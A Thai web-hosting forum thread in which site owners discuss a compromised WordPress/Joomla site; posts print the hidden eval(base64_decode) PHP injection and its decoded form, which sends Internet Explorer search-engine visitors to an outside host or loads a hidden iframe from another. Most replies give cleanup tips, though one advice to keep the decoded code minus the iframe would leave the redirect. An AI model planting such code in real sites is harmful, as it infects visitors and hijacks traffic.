ต่อไป »

[itmicrobit]

โค๊ด:

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHRydW09aGVhZGVyc19zZW50KCk7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWE9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKHN0cmlzdHIoJHVhLCJtc2llIikpew0KaWYgKCEkdHJ1bSl7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2FsYXBvdHJlbW5iYS5vc2EucGwvcmlmLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCn1lbHNlIHsNCmVjaG8gIjxpZnJhbWUgc3JjPSdodHRwOi8vcnRqaHRleWp0eWp0eWoub3JnZS5wbC9tZG0vJyBmcmFtZWJvcmRlcj0wIGhlaWdodD0xIHdpZHRoPTEgc2Nyb2xsaW5nPW5vPjwvaWZyYW1lPiI7DQp9DQoJfQ==")); 

แบบเนี้ย ครายโดน
เวลา seach google ก็โดนแบน เลย


ไซต์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ

[navico]

ยังโดนกันเรื่อยๆใช่ไหมนี่...

[mahaboyd]

โค๊ด:

error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
if (!$trum){
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
	if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://alapotremnba.osa.pl/rif/");
		exit();
	}
	}
}else {
echo "<iframe src='http://rtjhteyjtyjtyj.orge.pl/mdm/' frameborder=0 height=1 width=1 scrolling=no></iframe>";
}
	}

[itmicrobit]

รึว่า มันเป็นช่องโหว่ ทาง Php เลย อะ เฮ้อ
หรือช่องโหว่ทาง Wordpress
หรือช่องโหว่ ทาง MySql
หรือช่องโหว่ ทาง permission
หรือ server โดน Hack
หรือ อาไร
= ='

[sugar]

  สงสัยโดนเต็มๆๆ ไม่น่าละเว็บหายไปเลย ถามหน่อยครับในไฟล configuration.php ของ joomla มานมี base64_decode หรือปล่าว

  ทำไม่เรามีหว่า 

[itmicrobit]

ตกลง มัน คี๊อ   

[หนุกหนาน]

โค๊ด:

error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
if (!$trum){
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
	if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://alapotremnba.osa.pl/rif/");
		exit();
	}
	}
}else {
echo "<iframe src='http://rtjhteyjtyjtyj.orge.pl/mdm/' frameborder=0 height=1 width=1 scrolling=no></iframe>";
}
	}

อันนี้ถอดมาหรือครับ

[itmicrobit]

โค๊ด:

error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
if (!$trum){
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
	if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://alapotremnba.osa.pl/rif/");
		exit();
	}
	}
}else {
echo "<iframe src='http://rtjhteyjtyjtyj.orge.pl/mdm/' frameborder=0 height=1 width=1 scrolling=no></iframe>";
}
	}

อันนี้ รู้แล้ว แต่ วิธีการแก้ ปัญหา คื๊อ.........

[foxrank]

eval(base64_decode)  เป็นการเข้ารหัสของ PHP ซึ่ง code ภายในจะถูกซ่อนไว้ และจะถูกเรียกจาก remote server
ซึ่ง Server ปลายทางสามารถส่ง virus, cookie stuff หรือ auto run ต่าง ๆ ลงในเครื่องของ visitor เรา

ส่วนใหญ่เราจะเจอ eval(base64_decode) นี้จากพวก wordpress theme, joomla them ที่เอามาแชร์กัน (ของฟรีไม่มีในโลกครับ)
แต่ถ้าหากใครยังชอบของฟรีอยู่ แนะนำง่าย ๆ ครับ

พอ download  theme มา ให้เช็คทุก file ว่ามี code นี้ติดมาหรือเปล่า ถ้ามีติดมาให้ลบทั้ง code แล้ว run บน localhost ดูว่าใช้ได้ไหม
ถ้า theme ยังสามารถใช้งานได้ตามปกติ ก็โอเค แต่ถ้าหากใช้งานไม่ได้ก็เสียใจครับ

หากใครใช้ dream weaver ก็ ใช้  CTRL + F , ใส่ “eval(base64_decode” แล้ว run ครับเพื่อเช็ค
อีกอย่างหนึ่งหากได้ theme ที่ฟรีมา นอกจาก run eval(base64_decode เข็คแล้วให้ เช็คดูด้วยว่า มี Iframe ด้วยไหม
หากมี ก็ดูว่า iframe จาก web ไหนหากไม่แน่ใจให้ลบทิ้งครับ

เกือบลืม FTP ที่ใช้แนะนำให้ใช้ FileZilla เพราะหากใช้ตัว FTP ต่าง ๆ ที่ crack มาใช้ในการ FTP คุณกำลังเปิดประตู hosting ให้กับผู้อื่นสามารถเข้ามาให้ครับ

[หนุกหนาน]

โค๊ด:

error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
if (!$trum){
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
	if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://alapotremnba.osa.pl/rif/");
		exit();
	}
	}
}else {
echo "<iframe src='http://rtjhteyjtyjtyj.orge.pl/mdm/' frameborder=0 height=1 width=1 scrolling=no></iframe>";
}
	}

อันนี้ รู้แล้ว แต่ วิธีการแก้ ปัญหา คื๊อ.........

วิธีแก้หรือครับ
ก็ในเมื่อถอดออกมาได้โค้ดตามที่ว่ามา ก็ลบ พวกโค้ดเข้ารหัสเหล่านั้นออก แล้วเอาโค้ดที่ถอกออกมานี้ไปใส่แทน
โดยดัดแปลงบางส่วน เช่น เอา echo iframe ออก

[bird35793]

ผมก็เคยโดนนะครับ วิธีแก้ที่แท้จริงผมยังไม่ได้ลองนะครับ
แต่ตอนที่ผมแก้ก็ใช้ text editor ตัวไหนก็ได้ครับเข้าไปค้นหาแล้วก็ลบออก
ส่วนใหญ่โค๊ดนี้จะอยู่ล่าง ๆๆๆ ของ หน้านั้นคับ

แต่เท่าที่ผมลองดูนะครับ เหมือนตอนนั้นผมจะ search ใน dream แล้วไม่เจออะครับ
ถ้าไม่ไงก็ลองเปิดจาก text editor ตัวอื่นอย่างพวก editplus ก็ได้นะครับ

ส่วนเรื่อง ftp แนะนำตัว filezilla อีกคนนะครับ
ตอนนั้นที่ใช้ cute ftp อยู่ รู้สึก โปรแกรม anti ไวรัสผมจะมองเป็นไวรัสนะครับ

หวังว่าจะมีคนหาวิธีแก้ที่ดีกว่านี้นะครับ ๆๆๆๆ

[batdboyz]

ทำไมไอ่ไฟล์เข้ารหัสแบบนี้ บางทีผมลบแล้วก็ลบไม่ออกนะครับ

อย่างเช่น WP ธีม บางธีม ที่ฟุตเตอร์น่ะ อยากลบก็ลบไม่ได้ ลบแล้วมันก็ยังอยู่ ผมมั่นใจว่ามันเป็นโค้ดตัวนี้แน่ๆ ก็เลยงงๆ

ไม่รู้ติด Cache รึเปล่าที่ยังมองเห็นมันอยู่ - -'

[nutt49]

ผมโดนมาแล้ว 2 ครั้ง ลบกันหน้ามึดเลย ดีนะที่เครื่องแรง

[pjgunner]

ปรกติ เราไม่ค่อยใช้ eval กันเท่าไหร่

ใช้ dream search entire local site ด้วย "eval("

[samabois]

eval(base64_decode)  เป็นการเข้ารหัสของ PHP ซึ่ง code ภายในจะถูกซ่อนไว้ และจะถูกเรียกจาก remote server
ซึ่ง Server ปลายทางสามารถส่ง virus, cookie stuff หรือ auto run ต่าง ๆ ลงในเครื่องของ visitor เรา

ส่วนใหญ่เราจะเจอ eval(base64_decode) นี้จากพวก wordpress theme, joomla them ที่เอามาแชร์กัน (ของฟรีไม่มีในโลกครับ)
แต่ถ้าหากใครยังชอบของฟรีอยู่ แนะนำง่าย ๆ ครับ

พอ download  theme มา ให้เช็คทุก file ว่ามี code นี้ติดมาหรือเปล่า ถ้ามีติดมาให้ลบทั้ง code แล้ว run บน localhost ดูว่าใช้ได้ไหม
ถ้า theme ยังสามารถใช้งานได้ตามปกติ ก็โอเค แต่ถ้าหากใช้งานไม่ได้ก็เสียใจครับ

หากใครใช้ dream weaver ก็ ใช้  CTRL + F , ใส่ “eval(base64_decode” แล้ว run ครับเพื่อเช็ค
อีกอย่างหนึ่งหากได้ theme ที่ฟรีมา นอกจาก run eval(base64_decode เข็คแล้วให้ เช็คดูด้วยว่า มี Iframe ด้วยไหม
หากมี ก็ดูว่า iframe จาก web ไหนหากไม่แน่ใจให้ลบทิ้งครับ

เกือบลืม FTP ที่ใช้แนะนำให้ใช้ FileZilla เพราะหากใช้ตัว FTP ต่าง ๆ ที่ crack มาใช้ในการ FTP คุณกำลังเปิดประตู hosting ให้กับผู้อื่นสามารถเข้ามาให้ครับ

อีกตัวที่แนะนำว่าดีกว่าไฟล์ซิลล่าก็

WinSCP ครับ ฟรีแวร์ แต่เร็วได้ใจ

[KidTorB]

อัพผ่าน host สบายใจสุดแล้วครับ 

[Hikkie]

FileZilla ระวังนะครับ เก็บรหัสผ่านที่อยู่โฮส เป็น text file บนเครื่องที่ติดตั้งครับ

[bird35793]

ทำไมไอ่ไฟล์เข้ารหัสแบบนี้ บางทีผมลบแล้วก็ลบไม่ออกนะครับ

อย่างเช่น WP ธีม บางธีม ที่ฟุตเตอร์น่ะ อยากลบก็ลบไม่ได้ ลบแล้วมันก็ยังอยู่ ผมมั่นใจว่ามันเป็นโค้ดตัวนี้แน่ๆ ก็เลยงงๆ

ไม่รู้ติด Cache รึเปล่าที่ยังมองเห็นมันอยู่ - -'

ที่ลบไม่ได้นี้คือยังไงอะครับ ต้องถามก่อนว่าแก้ผ่าน wp โดยตรงหรือเปล่าอะครับ
หรือว่าแก้ผ่าน text editor แล้วค่อยอัพขึ้นไปอะคับ
อย่าที่ได้แนะนำไว้คับ ถ้าแก้ผ่าน text editor รู้สึกว่าใน dream ผมจะลบไม่ได้นะครับ
ผมเลยใช่ตัวอื่นลบอะครับ ลองดูแล้วกันนะครับว่าได้หรือเปล่า

[puma1420]

 

[batdboyz]

ทำไมไอ่ไฟล์เข้ารหัสแบบนี้ บางทีผมลบแล้วก็ลบไม่ออกนะครับ

อย่างเช่น WP ธีม บางธีม ที่ฟุตเตอร์น่ะ อยากลบก็ลบไม่ได้ ลบแล้วมันก็ยังอยู่ ผมมั่นใจว่ามันเป็นโค้ดตัวนี้แน่ๆ ก็เลยงงๆ

ไม่รู้ติด Cache รึเปล่าที่ยังมองเห็นมันอยู่ - -'

ที่ลบไม่ได้นี้คือยังไงอะครับ ต้องถามก่อนว่าแก้ผ่าน wp โดยตรงหรือเปล่าอะครับ
หรือว่าแก้ผ่าน text editor แล้วค่อยอัพขึ้นไปอะคับ
อย่าที่ได้แนะนำไว้คับ ถ้าแก้ผ่าน text editor รู้สึกว่าใน dream ผมจะลบไม่ได้นะครับ
ผมเลยใช่ตัวอื่นลบอะครับ ลองดูแล้วกันนะครับว่าได้หรือเปล่า

ขอบคุณคับ เดี๋ยวไว้ไปลอง ผมลบผ่าน text editor นี่แหละ